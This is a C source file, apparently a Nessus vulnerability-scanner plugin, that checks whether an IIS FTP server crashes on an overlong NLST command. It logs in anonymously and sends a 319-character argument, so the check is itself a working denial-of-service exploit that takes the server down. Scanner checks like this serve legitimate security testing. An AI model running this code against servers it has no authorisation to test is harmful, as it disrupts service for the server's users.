/*
 * 
 * ftp_mic_overflows
 *
 * This plugin was written by Renaud Deraison and is released
 * under the GPL
 *
 */
#include <includes.h>

#define NAME "IIS ftp server crash"
#define DESC "\
It is possible to make the IIS FTP server close all the active\n\
connections by issuing a too long NLST command which will make the\n\
FTP server crash\n\
An attacker can use this to prevent people from downloading\n\
anything from your FTP server\n\
Risk factor: medium"
#define COPYRIGHT "no copyright"
#define SUMM "crashes an IIS ftp server"




int init_ftp_session(struct arglist *);
int ftp_login(struct arglist *, int);
int send_bogus_command(int, char*, char*);


PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_DENIAL);
	plug_set_family(desc, "Denial of Service");
	return(0);
}
	


PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
	int soc;
        char * crap;
       
        signal(SIGPIPE, SIG_IGN);
	if(host_get_port_state(args, 21)<=0)return(0);
        crap = emalloc(320);
        memset(crap, 'A', 319);
        soc = init_ftp_session(args);
        if((soc >= 0) && 
           (plug_get_key(args, "ftp/anonymous_access"))&& 
           (ftp_login(args, soc)))
        {
          struct sockaddr_in addr;
          int soc2;
          
          if(ftp_get_pasv_address(soc, &addr))return(1);
          soc2 = socket(AF_INET, SOCK_STREAM, 0);
          if(connect(soc2, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)))
         	return(1);
          
          send_bogus_command(soc, "NLST", crap);
          shutdown(soc, 2);
          close(soc);
          shutdown(soc2, 2);
          close(soc2);
          
          if((soc = open_sock_tcp(args, 21))<0)
           {
            char * report = emalloc(2048);
         sprintf(report,
"Sending a too long argument to the NLST command made\n\
the remote FTP crash.\n\
Solution : contact your vendor for a patch");
         
         post_hole(args, 21, report);
         efree(&report);
        }
        else shutdown(soc, 2);
        close(soc);
       }
	return(0);
}


int init_ftp_session(args)
 struct arglist * args;
{
 int soc = open_sock_tcp(args, 21);
 char * buf = emalloc(1024);
 
 if(soc >= 0)recv_line(soc, buf, 1024);
 if(strncmp(buf, "220", 3))return(-1);
 while(buf[3]=='-')recv_line(soc, buf, 1024);
 efree(&buf);
 return(soc);
}


int ftp_login(args, soc)
 struct arglist * args;
 int soc;
{
 char * buf = emalloc(1024);
 int a = 0;
 int ok;
 sprintf(buf, "USER ftp\n");
 send(soc, buf, strlen(buf), 0);
 bzero(buf, 1024);
 recv_line(soc, buf, 1024);
 sprintf(buf, "PASS joe@\n");
 send(soc, buf, strlen(buf), 0);
 bzero(buf, 1024);
 recv_line(soc, buf, 1024);
 
 if(!strncmp(buf, "230", 3))ok = 1;
 else ok = 0;
 
 a = 1;
 while(a)
 { 
  bzero(buf, 1024);
  ioctl(soc, FIONREAD, &a);
  if(a)recv_line(soc, buf, 1024);
  }
  
 efree(&buf);
 return(ok);
}


int send_bogus_command(soc, command, crap)
 int soc;
 char * command;
 char * crap;
{
 char * buf = emalloc(strlen(crap)+strlen(command)+10);
 int ret = 0;
 sprintf(buf, "%s %s\n", command, crap);
 send(soc, buf, strlen(buf), 0);
 bzero(buf, strlen(buf));
 recv_line(soc, buf, strlen(crap)+strlen(command)+10);
 if(!strlen(buf))ret = 1;
 else ret = 0;
 efree(&buf);
 return(ret);
}
